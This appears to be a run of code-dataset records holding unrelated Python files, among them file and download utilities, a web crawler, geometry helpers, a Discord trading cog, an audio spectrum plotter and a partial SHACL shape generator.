'green'\n _ok(\" ✔ \")\n\n def fail():\n spinner.color = 'red'\n _fail(\" ✘ \")\n\n spinner.succeed = succeed\n spinner.ok = succeed\n spinner.fail = fail\n\n spinner.start()\n return spinner\n\ndef log_success(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'green'\n spinner.ok(' ✔ ')\n\ndef log_fail(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'red'\n spinner.ok(' ✘ ')\n\ndef log_info(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'blue'\n spinner.ok(' 🛈 ')\n\ndef log_warn(message):\n from yaspin import yaspin\n spinner = yaspin(text=message).bold\n spinner.color = 'yellow'\n spinner.ok(' ⚠ ')\n\n\ndef project_path(path):\n return joinp(os.path.dirname(os.path.dirname(__file__)), path)\n\n\ndef temp_path(path):\n from .config import config\n return os.path.join(config._tmp_dir, path)\n\ndef cwd(path, create=False):\n if not os.path.exists(path):\n if create:\n os.makedirs(path)\n else:\n raise ValueError('Path {} does not exist'.format(path))\n os.chdir(path)\n\n\ndef exists(path):\n return os.path.exists(path)\n\ndef download(url, output, redownload=False):\n from tqdm import tqdm\n import requests\n import math\n\n if not redownload and os.path.exists(output):\n return\n\n r = requests.get(url, stream=True)\n\n total_size = int(r.headers.get('content-length', 0)); \n block_size = 1024\n wrote = 0 \n with open(output, 'wb') as f:\n progress = tqdm(\n r.iter_content(block_size), \n total=math.ceil(total_size//block_size) , \n unit='KB', unit_scale=True,\n desc='Downloading {}'.format(os.path.basename(output))\n )\n for data in progress:\n wrote = wrote + len(data)\n f.write(data)\n\n if total_size != 0 and wrote != total_size:\n print(\"ERROR, something went wrong\") \n\n\ndef extract_from(zip, target_file, output_path='.'):\n import zipfile, fnmatch\n with zipfile.ZipFile(zip) as zip_file:\n for member in zip_file.namelist():\n if fnmatch.fnmatch(member, target_file):\n filename = os.path.basename(member)\n if not filename:\n continue\n source = zip_file.open(member)\n target = open(os.path.join(output_path, filename), \"wb\")\n with source, target:\n shutil.copyfileobj(source, target)\n\n\ndef copy(from_path, to_path):\n import glob\n for src in glob.glob(from_path):\n shutil.copy(src, to_path)\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"210509624","text":"class fibonacci():\n def __init__(self,number):\n self.number=number\n self.a=0\n self.b=1\n self.count=0\n def fibo(self):\n if self.number==0:\n return self.a\n if self.number==1:\n return self.b\n fib =self.a\n if self.count==self.number-2:\n return self.b+self.a\n self.a,self.b=self.b,self.a+self.b\n self.count+=1\n return self.fibo()\n","sub_path":"pythonlab3/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"276865571","text":"from bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom queue import Queue\nimport datetime\nimport re\nfrom MilitaryKG.tools.html_paser import html_paser\nfrom MilitaryKG.tools.MyThreadPool import MyThreadPool\nfrom MilitaryKG.Pre.GetEntitySet import GetWeaponSet,GetWarSet,GetCompanySet\n\nclass Producer(object):\n @staticmethod\n def producer(q, data):\n q.put(data)\n\ndef insertDB(data):\n fp.write(str(data)+'\\n')\n fp.flush()\n\n# 构造生产者\ndef product_data(title):\n entity_queue = Queue()\n eval_str = 'Get'+title+'Set()'\n entity_set = eval(eval_str)\n for item in entity_set:\n Producer.producer(entity_queue, item)\n return entity_queue\n\n# 爬取每一个页面\ndef turn_page_thread(submission):\n url_pre = \"https://baike.baidu.com/item/\"\n url = url_pre+submission\n html = html_paser(url, 'utf-8')\n if html == 0:\n return\n pattern = re.compile('main-content')\n if re.search(pattern, html) is None:\n return\n soup = bs(html, 'html.parser')\n box = soup.find(attrs={'class': 'lemma-summary'})\n if box is None:\n return\n info = box.findAll(attrs={'class' : 'para' })\n if len(info) == 0:\n return\n str = ''\n for item in info:\n str += item.text\n triple = [submission, 'abstract', str]\n Producer.producer(entity_queue, triple)\n\nmaxsize = 25\nprint(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n# titles = ['Weapon','War','Company']\ntitles = ['Weapon']\n\nfor title in titles:\n save_path = \"../../data/baidubaike/\" + title + \"_abstract.txt\"\n fp = open(save_path, 'w+', encoding='utf-8')\n\n q = product_data(title)\n entity_queue = Queue()\n pool = MyThreadPool()\n pool.addthread(queue=q, size=maxsize, func=turn_page_thread, timeout=15)\n pool.addthread(queue=entity_queue, size=1, func=insertDB, timeout=20)\n pool.startAll()\n pool.joinAll()\n fp.close()\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), \"结束\")\n\n\n","sub_path":"Crawler/baidubaike/entity_abstract.py","file_name":"entity_abstract.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"226741416","text":"import numpy as np\n\n# Shapely Library\nfrom shapely.geometry import Polygon\nfrom shapely.geometry.polygon import LineString\n\n\ndef get_track_waypoints(track_name, absolute_path=\".\"):\n return np.load(\"%s/Tracks/%s.npy\" % (absolute_path, track_name))\n\n\ndef load_track(track_name, absolute_path=\".\"):\n if track_name.endswith('.npy'):\n track_name = track_name[:-4]\n\n waypoints = get_track_waypoints(track_name, absolute_path)\n\n # print(\"Loaded %s waypoints\" % waypoints.shape[0])\n\n l_inner_border = LineString(waypoints[:, 2:4])\n l_outer_border = LineString(waypoints[:, 4:6])\n road_poly = Polygon(np.vstack((l_outer_border, np.flipud(l_inner_border))))\n\n # rescale waypoints to centimeter scale\n center_line = waypoints[:, 0:2] * 100\n inner_border = waypoints[:, 2:4] * 100\n outer_border = waypoints[:, 4:6] * 100\n\n return center_line, inner_border, outer_border, road_poly\n\n\ndef get_angle(p0, p1, p2):\n v0 = np.array(p0) - np.array(p1)\n v1 = np.array(p2) - np.array(p1)\n\n angle = np.math.atan2(np.linalg.det([v0, v1]), np.dot(v0, v1))\n return np.degrees(angle)\n\n\ndef get_vector_length(v):\n return np.sqrt(v[0] ** 2 + v[1] ** 2)\n\n\ndef normalize_vector(v):\n return v / get_vector_length(v)\n\n\n# TODO Watch this, it might be putting points inside out\ndef get_orthogonal_vector_for_straight_line(before, point):\n v0 = np.array(before) - np.array(point)\n if v0[0] * v0[1] == 0:\n border_vector = -np.array([-v0[1], v0[0]])\n else:\n border_vector = -1 / np.array([-v0[0], v0[1]])\n\n border_vector = normalize_vector(border_vector)\n\n return border_vector\n\n\ndef crossing_point_for_two_lines(l1_p1, l1_p2, p, p2):\n if l1_p1[0] == l1_p2[0]:\n # if the waypoint line is vertical\n x = l1_p1[0]\n a1, b1 = get_a_and_b_for_line(p, p2)\n elif p[0] == p2[0]:\n # if the location line is vertical\n x = p[0]\n a1, b1 = get_a_and_b_for_line(l1_p1, l1_p2)\n else:\n a1, b1 = get_a_and_b_for_line(l1_p1, l1_p2)\n a2, b2 = get_a_and_b_for_line(p, p2)\n x = (b2 - b1) / (a1 - a2)\n y = a1 * x + b1\n return x, y\n\n\ndef get_a_and_b_for_line(p1, p2):\n a1 = (p1[1] - p2[1]) / (p1[0] - p2[0])\n b1 = p2[1] - a1 * p2[0]\n return a1, b1\n\n\ndef get_a_point_on_a_line_closest_to_point(l1_p1, l1_p2, p):\n vector = get_orthogonal_vector_for_straight_line((l1_p1[0], l1_p1[1]),\n (l1_p2[0], l1_p2[1]))\n p2 = np.array([p[0], p[1]]) + vector\n crossing_point = crossing_point_for_two_lines(l1_p1, l1_p2, p, p2)\n return crossing_point\n\n\ndef is_point_on_the_line(l1_x1, l1_y1, l1_x2, l1_y2, x1, x2):\n a1 = get_angle([l1_x1, l1_y1], [l1_x2, l1_y2], [x1, x2])\n a2 = get_angle([l1_x1, l1_y1], [l1_x2, l1_y2], [x1, x2])\n return a1 < 5 and a2 < 5\n\n\ndef plot_trackpoints(trackpoints, show=True):\n import matplotlib.pyplot as plt\n for point in trackpoints:\n plt.scatter(point[0], point[1], c=\"blue\")\n plt.scatter(point[2], point[3], c=\"black\")\n plt.scatter(point[4], point[5], c=\"cyan\")\n if show:\n plt.show()\n","sub_path":"Notebooks/python/track_utils.py","file_name":"track_utils.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"394655040","text":"#!/usr/bin/env python3\nimport sys\ntry:\n from typing import List\nexcept ImportError:\n pass\n\n\ndef solve(H: int, W: int, a: \"List[List[int]]\"):\n ans = [] # type: List[List[int]]\n p = 0\n for i in range(H):\n if i % 2 == 0:\n js = range(W)\n else:\n js = reversed(range(W))\n for j in js:\n if a[i][j] % 2 == 1:\n p ^= 1\n nexti = i\n nextj = j + (1 if i % 2 == 0 else -1)\n if nextj == -1:\n nexti += 1\n nextj = 0\n elif nextj == W:\n nexti += 1\n nextj = W - 1\n if p:\n ans.append([i, j, nexti, nextj])\n if p:\n del ans[-1]\n print(len(ans))\n for i, j, nexti, nextj in ans:\n print(i + 1, j + 1, nexti + 1, nextj + 1)\n\n\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n H = int(next(tokens)) # type: int\n W = int(next(tokens)) # type: int\n a = [[int(next(tokens)) for _ in range(W)] for _ in range(H)] # type: \"List[List[int]]\"\n solve(H, W, a)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python_codes/p03263/s060989571.py","file_name":"s060989571.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"649213398","text":"\r\n# Arguments => ค่าที่ส่งเข้าไปในฟังก์ชั่น # Arguments = name, lname (ตอนเรียกใช้งานฟังก์ชั่น)\r\n# Parameter => ค่าตัวแปรที่รับข้อมูลที่ส่งมาทำงาน จาก Arguments = a,b\r\n#อาส่ง - พารับ\r\n\r\ndef mydata(a,b): # ส่งค่าใน () Structure : def func_name(ตัวแปรที่ต้องการส่งเข้ามาทำงานในฟังก์ชัน(parameter))\r\n print(\"name:\",a,b)\r\n\r\nname = input(\"Input name: \")\r\nlname = input(\"Input lname: \")\r\nmydata(name,lname)\r\n","sub_path":"KR_Python_Day 9_Arguments & Parameter.py","file_name":"KR_Python_Day 9_Arguments & Parameter.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540121287","text":"from rest_framework.routers import DefaultRouter\nfrom django.conf.urls import url,include\nfrom .api import UsersViewSet,ClientesViewSet\nfrom django.urls import path\nfrom . import views\n\nrouter = DefaultRouter()\nrouter.register(r'users',UsersViewSet)\nrouter.register(r'clientes',ClientesViewSet)\n\nurlpatterns = [\n path('cards_endpoint', include(router.urls)),\n\n path(\"register/\", views.UserRegister,name='register'),\n path(\"login/\", views.UserLogin,name='login'),\n path(\"logout/\", views.UserLogout,name='logout'),\n\n path(\"profile_edit/\", views.UserEditProfile, name='profile_edit'),\n path(\"user_profile/\", views.UserProfile, name='user_profile'),\n path(\"user_change_password/\", views.UserChangePassword, name='user_change_password'),\n\n path(\"index/\", views.paginaInicial, name='index'),\n path(\"register_cliente/\", views.RegisterClientes, name='register_cliente'),\n path(\"list_clientes/\", views.ListClientes, name='list_clientes'),\n path(\"cliente_view//\", views.ClientesView, name='cliente_view'),\n path(\"cliente_delete//\", views.ClientesDelete, name='cliente_delete'),\n path(\"pdmodel/sum_table/\", views.SumTable,name='sum_table'),\n path(\"pdmodel/actual_df/\", views.ActualPredictedProbs,name='actual_df'),\n path(\"pdmodel/score_card/\", views.ScoreCard,name='score_card'),\n path(\"pdmodel/credit_score/\", views.CreditScore,name='credit_score'),\n path(\"pdmodel/cut_off/\", views.CutOffs,name='cut_off'),\n path(\"lgdmodel/sum_table/\", views.LgdSumTable,name='lgdmodel_sum_table'),\n path(\"lgdmodel/proba/\", views.ProbaFunction,name='lgdmodel_proba'),\n path(\"lgdmodel/df_actual/\", views.LgdActualPreditedProbs,name='lgdmodel_df_actual'),\n path(\"eadmodel/\", views.getEADModel,name='eadmodel'),\n path(\"expectedlost/\", views.getExpectedLostModel,name='expectedlost'),\n]","sub_path":"cards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"146518229","text":"import asyncio\nimport string\nimport secrets\n\nfrom discord.ext import commands\n\nfrom database import DatabaseIdol, DatabaseDeck\n\n\nclass Trade(commands.Cog):\n def __init__(self, bot):\n \"\"\"Initial the cog with the bot.\"\"\"\n self.bot = bot\n\n #### Commands ####\n @commands.command(description='Trade one idol for another.')\n async def trade(self, ctx, user, name, group=None):\n if not ctx.message.mentions:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Please specify a user.')\n return None\n\n id_idol_give = await self.can_give(ctx, ctx.author, name, group)\n if not id_idol_give:\n return\n\n user = ctx.message.mentions[0]\n\n def check_name_group(message):\n param = list(filter(None, map(str.strip, message.content.split('\"'))))\n return message.author == user and (not param or 1 <= len(param) <= 2)\n\n await ctx.send(f'{user.mention}, {ctx.author.mention} wants to trade with you.\\n'\n f'Who do you want to trade for **{name}** ?\\n'\n f'\\nType name [\"group\"] **(\"\" required around group!)**')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check_name_group)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Too late... Give is cancelled.')\n return\n\n arg = list(filter(None, map(str.strip, msg.content.split('\"'))))\n name_receive = arg[0]\n group_receive = [] if len(arg) == 1 else arg[1]\n\n id_idol_receive = await self.can_give(ctx, user, name_receive, group_receive)\n if not id_idol_receive:\n return\n\n def check(message):\n return message.author == ctx.author and \\\n (message.content.lower() == 'yes' or message.content.lower() == 'y' or\n message.content.lower() == 'no' or message.content.lower() == 'n')\n\n await ctx.send(f'{user.mention} trades **{name_receive}** for **{name}**.\\n'\n f'{ctx.author.mention}, do you accept? (y|yes or n|no)\\n')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Too late... Give is cancelled.')\n else:\n if msg.content.lower() == 'y' or msg.content.lower() == 'yes':\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol_give, ctx.author.id, user.id)\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol_receive, user.id, ctx.author.id)\n await ctx.message.add_reaction(u\"\\u2705\")\n await msg.add_reaction(u\"\\u2705\")\n else:\n await ctx.send('Trade is cancelled.')\n\n @commands.command(description='Give one idol to someone.')\n async def give(self, ctx, user, name, group=None):\n if not ctx.message.mentions:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Please specify a user.')\n return None\n\n id_idol = await self.can_give(ctx, ctx.author, name, group)\n if not id_idol:\n return\n\n user = ctx.message.mentions[0]\n\n def check(message):\n return message.author == user and (message.content.lower() == 'yes' or message.content.lower() == 'y' or\n message.content.lower() == 'no' or message.content.lower() == 'n')\n\n await ctx.send(f'{user.mention}, {ctx.author.mention} wants to give you **{name}**.\\n'\n f'Type y|yes or n|no.')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Too late... Give is cancelled.')\n else:\n if msg.content.lower() == 'y' or msg.content.lower() == 'yes':\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol, ctx.author.id, user.id)\n await ctx.message.add_reaction(u\"\\u2705\")\n await msg.add_reaction(u\"\\u2705\")\n else:\n await ctx.send('Give is cancelled.')\n\n @commands.command(description='Remove an idol from your deck (can\\'t be undone!).')\n async def discard(self, ctx, name, group=None):\n id_idol = await self.can_give(ctx, ctx.author, name, group)\n if not id_idol:\n return\n\n def check(message):\n return message.author == ctx.author \\\n and message.channel == ctx.message.channel \\\n and (message.content.lower() == 'yes' or message.content.lower() == 'y' or\n message.content.lower() == 'no' or message.content.lower() == 'n')\n\n await ctx.send(f'{ctx.author.mention}, are you sure you want to discard **{name}**? (y|yes or n|no)\\n')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Discard is cancelled.')\n else:\n if msg.content.lower() == 'y' or msg.content.lower() == 'yes':\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol, ctx.author.id, None)\n await ctx.message.add_reaction(u\"\\u2705\")\n await msg.add_reaction(u\"\\u2705\")\n else:\n await ctx.send('Discard is cancelled.')\n\n @commands.command(description='Remove all idols from your deck (can\\'t be undone!).')\n async def discard_all(self, ctx):\n letters = string.ascii_letters\n random_string = 'cancel'\n\n while random_string == 'cancel':\n random_string = ''.join(secrets.choice(letters) for i in range(5))\n\n def check(message):\n return message.author == ctx.author \\\n and message.channel == ctx.message.channel \\\n and (message.content == random_string or message.content.lower() == 'cancel')\n\n await ctx.send(f'{ctx.author.mention}, are you sure you want to discard **all your deck**?\\n'\n f'This cannot be undone! Please type *{random_string}* (with case) to confirm '\n f'or *cancel* to cancel.')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Discard is cancelled.')\n else:\n if msg.content.lower() == 'cancel':\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Discard is cancelled.')\n return\n\n ids_deck = DatabaseDeck.get().get_user_deck(ctx.guild.id, ctx.author.id)\n\n for id_idol in ids_deck:\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol, ctx.author.id, None)\n\n await ctx.message.add_reaction(u\"\\u2705\")\n await msg.add_reaction(u\"\\u2705\")\n\n @staticmethod\n async def can_give(ctx, author, name, group=None):\n \"\"\"Return idol id if the user can give, None otherwise.\"\"\"\n ## Find idol id\n name = name.strip()\n\n if group:\n group = group.strip()\n\n id_idol = None\n\n if group:\n id_idol = DatabaseIdol.get().get_idol_group_id(name, group)\n else:\n ids = DatabaseIdol.get().get_idol_ids(name)\n if ids:\n id_idol = ids[0]\n\n if not id_idol:\n msg = f'I searched everywhere for **{name}**'\n if group:\n msg += f' in the group *{group}*'\n msg += ' and I couldn\\'t find anything.\\nPlease check the command.'\n await ctx.send(msg)\n return None\n\n ## Check if idol belongs to author\n owner = DatabaseDeck.get().idol_belongs_to(ctx.guild.id, id_idol)\n if not owner or owner != author.id:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send(f'You don\\'t own **{name}**{\" from *\" + group + \"* \" if group else \"\"}...')\n return None\n\n return id_idol\n","sub_path":"src/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293664698","text":"\n\n\n\n'''\n┌ [[block, block, ...]] ┐\n│ [buffer] │\n│ [buffer] │ stack\n│ [buffer] │\n└ [...] ┘\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport scipy.io.wavfile\nimport scipy.signal\nimport sounddevice as sd\n\nbitrate = 44100\ndownsamplerate = 10 # осреднение пачками по n (микрофон не дает ничего, кроме 44100)\nblocksize = 4410 # величина блока, забираемого из потока (на значениях более 20000 глючит)\nbuffersize = 2 # величина буфера (в блоках)\nstacksize = 1 # величина стека осреднения (в буферах)\n\naw_data = np.array((6.3, -85.4,\n 6.3, -85.4,\n 8, -77.8,\n 10, -70.4,\n 12.5, -63.4,\n 16, -56.7,\n 20, -50.5,\n 25, -44.7,\n 31.5, -39.4,\n 40, -34.6,\n 50, -30.2,\n 63, -26.2,\n 80, -22.5,\n 100, -19.1,\n 125, -16.1,\n 160, -13.4,\n 200, -10.9,\n 250, -8.6,\n 315, -6.6,\n 400, -4.8,\n 500, -3.2,\n 630, -1.9,\n 800, -0.8,\n 1000, 0,\n 1250, 0.6,\n 1600, 1,\n 2000, 1.2,\n 2500, 1.3,\n 3150, 1.2,\n 4000, 1,\n 5000, 0.5,\n 6300, -0.1,\n 8000, -1.1,\n 10000, -2.5,\n 12500, -4.3,\n 16000, -6.6,\n 20000, -9.3))\naw = aw_data[::2], aw_data[1:][::2]\n\n#GdB = 20log_10(A2/A1)\n#A2 = A1 * 10**(Gdb/20)\n\ndef abydb(A1, Gdb):\n A2 = A1 * 10**(Gdb / 20)\n return A2\n\n\n\n\n\n\n\n\n\n\nfig = plt.figure()\nxlim = (1e1, 1e4) # диапазон частот\nylim = (1e-9, 1e4) # диапазон плотностей\nax = plt.axes(xlim=xlim, ylim=ylim, xscale='log', yscale='log')\n\npoints = ax.plot([], [], marker='.')[0] # заготовка\n\ndef animate(i):\n stack = np.zeros((stacksize, 438))\n for j in range(stacksize):\n\n # %%\n buffer = np.zeros((buffersize, blocksize//downsamplerate))\n for i in range(buffersize):\n def callback(indata, frames, time, status):\n dsblock = scipy.signal.decimate(indata.T[0], downsamplerate)\n # print(dsblock.shape)\n buffer[i].put(np.arange(dsblock.size), dsblock)\n with sd.InputStream(device=1, callback=callback,\n blocksize=blocksize, channels=1):\n sd.sleep(int(blocksize / bitrate * 1000 + 42))\n\n spec = np.abs(np.fft.fft(buffer.flatten()))**2\n freq = np.fft.fftfreq(buffer.flatten().size, 1/(bitrate/downsamplerate))\n idx = np.argwhere((freq > 13.75) & (freq < 500000))\n spec_cut = spec[idx]\n freq_cut = freq[idx]\n spec_cut_aw = abydb(spec_cut, np.interp(freq_cut, aw[0], aw[1])) # A-weighting\n # ax = plt.axes(xlim=xlim, ylim=ylim, xscale='log', yscale='log')\n # ax.plot(freq_cut, spec_cut)\n # spec_cut.shape\n\n # %%\n\n stack[j] = spec_cut_aw.flatten()\n # print(np.mean(stack, 0).shape)\n points.set_data(freq_cut, np.mean(stack, 0))\n\n\nfps = 2\nanim = animation.FuncAnimation(fig, animate, frames=42, interval=1000/fps)\n\n\n\n\n\n\n\n","sub_path":"soundmax/!dump/sdm 1.2 190409-2004.py","file_name":"sdm 1.2 190409-2004.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352399321","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/romainegele/Documents/Argonne/deephyper/build/lib/deephyper/search/nas/baselines/deepq/experiments/enjoy_mountaincar.py\n# Compiled at: 2019-07-10 12:45:57\n# Size of source mod 2**32: 642 bytes\nimport gym\nfrom deephyper.search.nas.baselines import deepq\nfrom deephyper.search.nas.baselines.common import models\n\ndef main():\n env = gym.make('MountainCar-v0')\n act = deepq.learn(env,\n network=models.mlp(num_layers=1, num_hidden=64),\n total_timesteps=0,\n load_path='mountaincar_model.pkl')\n while True:\n obs, done = env.reset(), False\n episode_rew = 0\n while not done:\n env.render()\n obs, rew, done, _ = env.step(act(obs[None])[0])\n episode_rew += rew\n\n print('Episode reward', episode_rew)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/deephyper-0.1.5-py2.py3-none-any/enjoy_mountaincar.cpython-36.py","file_name":"enjoy_mountaincar.cpython-36.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164906627","text":"#! python3\n# makeBrazil.py\n\nimport sys, shutil, os\nfrom PIL import Image\n\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\noriginal = Image.open(sys.argv[1])\nprint(original.size)\nmosaic = Image.new('RGB', (original.size[0]*200, original.size[1]*200), color=(255,255,255))\n\npath = ('C:\\\\test\\\\LKDlogos\\\\')\nlogoList = os.listdir(path)\n\nnextImage = 0\n\nfor c in range(0,original.size[0]):\n for r in range(0,original.size[1]):\n pixel = original.getpixel((c,r))\n if pixel == 0:\n logo = Image.open(path+logoList[nextImage]).resize((200, 200))\n nextImage += 1\n mosaic.paste(logo, (c*200, r*200))\n\nmosaic.save(\"C:\\\\test\\\\mosaic.png\")","sub_path":"logoMosaic.py","file_name":"logoMosaic.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"598132585","text":"#!/usr/bin/env python\n\n\nimport collections\nimport json\nfrom datetime import datetime\nfrom urllib.parse import urlparse\n\nimport pkg_resources\nimport rdflib\nfrom progressbar import Percentage, ProgressBar,Bar,ETA\nfrom rdflib import Namespace, URIRef, BNode, Literal\nfrom rdflib.namespace import RDF\nfrom rdflib.util import guess_format\n\n\nclass data_graph():\n def __init__(self, args: list):\n self.G = rdflib.Graph()\n self.G.open(\"store\", create=True)\n print(args)\n for graph in args:\n self.G.parse(graph, format=guess_format(graph))\n print(\"Finished loading graph....\")\n print(len(self.G))\n self.CLASSES = collections.OrderedDict()\n self.PROPS = collections.OrderedDict()\n self.PROPS_NEW = collections.OrderedDict()\n self.OUT = []\n\n path = 'prefixes/namespaces.json'\n filepath = pkg_resources.resource_filename(__name__, path)\n\n with open(filepath, 'r', encoding='utf-8') as fin:\n self.names = json.load(fin)\n self.namespaces = []\n print(len(self.G))\n\n def parse_uri(self, URI):\n if '#' in URI:\n label = URI.split(\"#\")[-1]\n else:\n label = URI.split(\"/\")[-1]\n return label\n\n def gen_prefix_bindings(self):\n count = 0\n subs = []\n for s, p, o in self.G.triples((None, None, None)):\n subs.append(p)\n for s, p, o in self.G.triples((None, RDF.type, None)):\n subs.append(o)\n subs = list(set(subs))\n for pred in subs:\n if pred.replace(self.parse_uri(pred), '') not in self.names.values():\n count = count + 1\n self.names['ns' + str(count)] = pred.replace(self.parse_uri(pred), '')\n for pref, uri in self.names.items():\n for s in subs:\n if uri == s.replace(self.parse_uri(s), ''):\n self.namespaces.append((pref, uri))\n self.namespaces = list(set(self.namespaces))\n\n def sh_label_gen(self, uri):\n parsed = uri.replace(self.parse_uri(uri), '')\n for cur, pref in self.names.items():\n if pref == parsed:\n return cur + '_' + self.parse_uri(uri)\n\n def uri_validator(self, x):\n try:\n result = urlparse(x)\n return all([result.scheme, result.netloc])\n except:\n return False\n\n def gen_shape_labels(self, URI):\n if '#' in URI:\n label = URI.split(\"#\")[-1]\n else:\n label = URI.split(\"/\")[-1]\n return label + '_'\n\n def extract_classes(self):\n print(\"INFO: extract_classes ...\")\n classes = []\n for s, p, o in self.G.triples((None, RDF.type, None)):\n classes.append(o)\n print(\"INFO: appended classes in classes array...\")\n for c in sorted(classes):\n self.CLASSES[c] = {}\n count = 0\n print(\"INFO: self.CLASSES[c] keys prepared for dict...\")\n print(\"INFO: Started iterating over self.Classes.keys dictionary\")\n pbar = ProgressBar()\n for class_item in pbar(self.CLASSES.keys()):\n # self.CLASSES[class_item]['label'] = self.sh_label_gen(class_item)\n if (self.parse_uri(class_item)):\n self.CLASSES[class_item]['label'] = self.parse_uri(class_item) + \"Shape\"\n else:\n print(\"## error for class item \" + class_item + \" line 91-93 of file shaclgen.py\")\n print(\"INFO: Loop Finished....\")\n\n def extract_props(self):\n self.extract_classes()\n prop = []\n pbar = ProgressBar()\n\n print(\"INFO: Predicate appending ...\")\n for predicate in self.G.predicates(object=None, subject=None):\n prop.append(predicate)\n\n print(\"INFO: RDF.Type prop loop....\")\n props = [x for x in pbar(prop) if x != rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type')]\n\n print(\"INFO: Started preparing props keys....\")\n for p in sorted(props):\n self.PROPS[p] = {}\n print(\"INFO: Finished preparing props keys....\")\n count = 0\n print(\"INFO: Length of Props: \" + str(len(self.PROPS)))\n\n print(\"INFO: Iterating over PROPS.Keys....\")\n N = len(self.PROPS.keys())\n print(N)\n\n pbarr = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval = N)\n\n for p in pbarr(self.PROPS.keys()):\n print(count)\n self.PROPS[p]['nodekind'] = None\n self.PROPS[p]['cardinality'] = None\n\n count = count + 1\n self.PROPS[p]['classes'] = []\n valProp = str(self.parse_uri(p))\n self.PROPS[p]['label'] = valProp\n prop_classes = []\n\n for sub, pred, obj in self.G.triples((None, p, None)):\n for sub1, pred1, obj1 in self.G.triples((sub, RDF.type, None)):\n prop_classes.append(obj1)\n\n uris = []\n # pbarIn = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval = len(prop_classes))\n [uris.append(x) for x in prop_classes if x not in uris]\n\n # counter = 0\n # pbarIn = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval=len(uris))\n # print(\"INFO: Iterating over URIS\")\n for x in uris:\n # Preparing a new Property\n # counter = counter + 1\n copyOfP = p\n if (self.CLASSES[x]['label']):\n newProp = copyOfP + self.CLASSES[x]['label'] + \"Property\"\n self.PROPS_NEW[newProp] = {}\n self.PROPS_NEW[newProp]['classes'] = []\n self.PROPS_NEW[newProp]['classes'].append(self.CLASSES[x]['label'])\n self.PROPS_NEW[newProp]['label'] = self.parse_uri(newProp)\n self.PROPS_NEW[newProp]['nodekind'] = None\n self.PROPS_NEW[newProp]['cardinality'] = None\n self.PROPS_NEW[newProp]['path'] = p\n # old\n self.PROPS[p]['classes'].append(self.CLASSES[x]['label'])\n else:\n 